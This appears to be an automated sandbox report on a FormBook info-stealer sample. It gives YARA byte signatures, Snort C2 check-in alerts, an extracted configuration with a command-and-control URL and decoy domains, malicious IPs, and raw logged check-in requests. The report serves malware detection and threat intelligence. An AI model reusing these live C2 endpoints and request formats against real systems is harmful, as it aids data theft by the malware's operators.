2.2.xheuzyg.exe.2f50000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
4.2.xheuzyg.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.xheuzyg.exe.400000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.xheuzyg.exe.400000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.xheuzyg.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.xheuzyg.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 3.33.130.190

Timestamp:	192.168.2.73.33.130.19049727802031412 11/03/23-12:38:11.760375
SID:	2031412
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 108.186.24.175

Timestamp:	192.168.2.7108.186.24.17549717802031412 11/03/23-12:36:49.663320
SID:	2031412
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 34.149.87.45

Timestamp:	192.168.2.734.149.87.4549729802031412 11/03/23-12:38:32.172304
SID:	2031412
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 104.17.158.1

Timestamp:	192.168.2.7104.17.158.149716802031412 11/03/23-12:36:28.890688
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 103.224.212.216

Timestamp:	192.168.2.7103.224.212.21649719802031412 11/03/23-12:37:30.104632
SID:	2031412
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 75.2.115.196

Timestamp:	192.168.2.775.2.115.19649718802031412 11/03/23-12:37:09.512099
SID:	2031412
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.glocraze.com/ju29/"], "decoy": ["xpermate.com", "bacheckadress.top", "jsrents.com", "xuangesmd.com", "mnchentampere.com", "iamdebs.com", "gwadkoup.com", "shoplittlezenone.shop", "jokergiftcard.buzz", "durufilmyapim.com", "sahabatterbaik19.xyz", "decode.tax", "wokeeducationhateskids.com", "klxcv.xyz", "dosfronterastx.com", "desertmoneymedia.com", "coynemanagement.online", "housesstore.com", "refreshquota.site", "hijama-pro.com", "gaming-chairs-vn-vi-2885437.fyi", "tuesdaymorningwuwu.com", "olivealley.online", "lineyours.com", "giollgoshop.site", "kelashealing.com", "spisanierussiadolgfaster.store", "bodacristianyjuani.com", "shop-hustlermindset.com", "theadelts.com", "umertazkeer.com", "infinitytrustbank.com", "thauthia12.click", "shutupandjam.net", "magick-cat.com", "power-pro.online", "wealthwithkate.com", "ascorpii.com", "quasi-discreetanga.best", "mzfgwh.top", "christopherromanski.online", "townstart.shop", "dwijtechnology.com", "rezultman.info", "e9pf4s.top", "pabmb5.top", "kprgrecruiting.com", "betmcc.pro", "girlypopups.com", "sellwithimam.com", "affordable58078.com", "sextapevidhot.com", "zg9tywlubmftzw5ldzmzmzk.com", "dilapakku.com", "tabareviera.com", "helpers4us.com", "sklm888.com", "greenspaces.xyz", "merchascarpamici.com", "ibrahimalnajjar.com", "xxds02.com", "idsuper-21.online", "naaraelucas.com", "hearing-aid-new.click"]}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe	ReversingLabs: Detection: 57%
Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe	Virustotal: Detection: 65%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.e9pf4s.top/ju29/	Avira URL Cloud: Label: phishing
Source: http://www.durufilmyapim.com	Avira URL Cloud: Label: malware
Source: http://www.durufilmyapim.com/ju29/	Avira URL Cloud: Label: malware
Source: http://www.durufilmyapim.com/ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA==	Avira URL Cloud: Label: malware
Source: http://www.umertazkeer.com/ju29/www.mzfgwh.top	Avira URL Cloud: Label: malware
Source: http://www.sklm888.com	Avira URL Cloud: Label: malware
Source: http://www.umertazkeer.com	Avira URL Cloud: Label: malware
Source: http://www.merchascarpamici.com/ju29/:	Avira URL Cloud: Label: malware
Source: http://www.wokeeducationhateskids.com	Avira URL Cloud: Label: malware
Source: http://www.merchascarpamici.com/ju29/	Avira URL Cloud: Label: malware
Source: http://www.mnchentampere.com/ju29/	Avira URL Cloud: Label: malware
Source: http://www.dwijtechnology.com/ju29/www.klxcv.xyz	Avira URL Cloud: Label: malware
Source: http://www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q	Avira URL Cloud: Label: malware
Source: http://www.bodacristianyjuani.com	Avira URL Cloud: Label: malware
Source: http://www.xuangesmd.com/ju29/	Avira URL Cloud: Label: malware
Source: http://www.xuangesmd.com	Avira URL Cloud: Label: malware
Source: http://www.wokeeducationhateskids.com/ju29/	Avira URL Cloud: Label: malware
Source: http://www.dwijtechnology.com/ju29/	Avira URL Cloud: Label: malware
Source: http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFms	Avira URL Cloud: Label: phishing
Source: http://www.klxcv.xyz/ju29/	Avira URL Cloud: Label: phishing
Source: http://www.townstart.shop/ju29/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.umertazkeer.com	Virustotal: Detection: 12%	Perma Link
Source: www.wokeeducationhateskids.com	Virustotal: Detection: 8%	Perma Link
Source: www.sklm888.com	Virustotal: Detection: 6%	Perma Link
Source: www.xuangesmd.com	Virustotal: Detection: 7%	Perma Link
Source: glocraze.com	Virustotal: Detection: 10%	Perma Link
Source: www.durufilmyapim.com	Virustotal: Detection: 12%	Perma Link
Source: www.townstart.shop	Virustotal: Detection: 11%	Perma Link
Source: www.gaming-chairs-vn-vi-2885437.fyi	Virustotal: Detection: 11%	Perma Link
Source: www.glocraze.com	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

ReversingLabs: Detection: 58%

Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: xheuzyg.exe, 00000002.00000003.1228223743.000000001DE10000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000002.00000003.1227185095.000000001DFB0000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: xheuzyg.exe, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00405EC2 FindFirstFileA,FindClose,	0_2_00405EC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004054EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Code function: 0_2_00402671 FindFirstFileA,	0_2_00402671
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001C16A5 FindFirstFileExW,	2_2_001C16A5
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001C16A5 FindFirstFileExW,	4_2_001C16A5

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4x nop then pop edi		4_2_00417D98
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi		6_2_00137D98

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.216 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 108.186.24.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.17.26.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.149.87.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.158.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 198.177.124.40 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49716 -> 104.17.158.1:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49717 -> 108.186.24.175:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49718 -> 75.2.115.196:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 103.224.212.216:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49727 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49729 -> 34.149.87.45:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.klxcv.xyz
Source:	DNS query: www.klxcv.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.glocraze.com/ju29/

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: PEGTECHINCUS PEGTECHINCUS

Source: global traffic	HTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=jZmXybDTEhqhfjbWt8DWyZKNvc7QdVfFN8RblV5F5bs2BRUWluOZEJKJ+J3f2kZBRyfQB9gctA== HTTP/1.1Host: www.gaming-chairs-vn-vi-2885437.fyiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?Bb_=n8Crfq9d8L0uMe2mi2N2bIuprmrMns3qA2Eid6rDPq5MkWbkjsGFJF992xVz/9ETWq9TUrQEIA==&M2Mp=6lX0R0Q HTTP/1.1Host: www.sklm888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=9Lm8jqPme8OjdFMw6eGY6bGRl079o6M7fF/LdPaGLMmXDMBCcOms1FNC+m6WNGhZ2iLvmxSXpQ== HTTP/1.1Host: www.wokeeducationhateskids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q HTTP/1.1Host: www.umertazkeer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?Bb_=gDkZXs6+uubhkTTBwUg7wBT+4b2V8qQlIvdPiiNfmflrZ9ZAj1bLhBmsLpsiQ7EDnpvm500CUg==&M2Mp=6lX0R0Q HTTP/1.1Host: www.glocraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA== HTTP/1.1Host: www.durufilmyapim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 75.2.115.196 75.2.115.196

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Nov 2023 11:37:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 03 Nov 2023 11:38:11 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: __d(function(e,n,t,r){"use strict";var a;Object.defineProperty(r,"__esModule",{value:!0}),function(e){e[e.VideoError=0]="VideoError",e[e.PlayerStateChanged=1]="PlayerStateChanged",e[e.Play=2]="Play",e[e.Pause=3]="Pause",e[e.GetCurrentTime=4]="GetCurrentTime",e[e.CurrentTime=5]="CurrentTime",e[e.SeekTo=6]="SeekTo"}(a=r.MessageType||(r.MessageType={})),r.default=function(e){return{html:"\n<html>\n<head>\n<style>\n iframe, html, body {\n margin: 0;\n padding: 0;\n background-color: black;\n width: "+e.width+"px;\n height: "+e.height+"px;\n }\n\n .fillAbsolute {\n position: absolute;\n left: 0;\n top: 0;\n width: "+e.width+"px;\n height: "+e.height+'px;\n }\n</style>\n</head>\n<body>\n <div id="player"></div>\n '+(e.videoPreviewUrl?'<img id="cover" class="fillAbsolute" src="'+e.videoPreviewUrl+'"/>':"")+"\n\n <script>\n var tag = document.createElement('script');\n tag.src = \"https://www.youtube.com/iframe_api\";\n var firstScriptTag = document.getElementsByTagName('script')[0];\n firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);\n\n var player;\n var coverRemoved = "+!e.videoPreviewUrl+";\n function onYouTubeIframeAPIReady() {\n player = new YT.Player('player', {\n height: '"+e.height+"',\n width: '"+e.width+"',\n videoId: '"+e.videoId+"',\n playerVars: {\n 'playsinline': 1,\n 'enablejsapi': 1,\n 'fs': 0,\n 'hl': '"+e.locale+"',\n 'iv_load_policy': 3,\n 'modestbranding': 1,\n 'controls': 0,\n 'rel': 0,\n },\n events: {\n 'onReady': onPlayerReady,\n 'onStateChange': onPlayerStateChange,\n 'onError': onError,\n }\n });\n }\n\n function onPlayerReady(event) {\n event.target.playVideo();\n\n document.addEventListener('message', function (event) {\n var data = JSON.parse(event.data);\n\n switch (data.type) {\n case "+a.Play+":\n player.playVideo();\n break;\n case "+a.Pause+":\n player.pauseVideo();\n break;\n case "+a.GetCurrentTime+":\n window.postMessage(JSON.stringify({\n type: "+a.CurrentTime+",\n currentTime: player.getCurrentTime(),\n }));\n break;\n case "+a.SeekTo+":\n player.seekTo(data.seekTo, !data.isDragging);\n break;\n }\n });\n }\n\n function onError() {\n window.postMessage(JSON.stringify({type: "+a.VideoError+"}));\n }\n\n function onPlayerStateChange(event) {\n if (event.data === 1 && !coverRemoved) {\n var cover = document.getElementById('cover');\n\n if

Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aefxx.com/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/fabric-assets-license
Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://calyptus.eu/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/android-remote-stacktrace/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://creativecommons.org/publicdomain/zero/1.0/
Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://facebook.github.io/react-native/docs/navigation.html
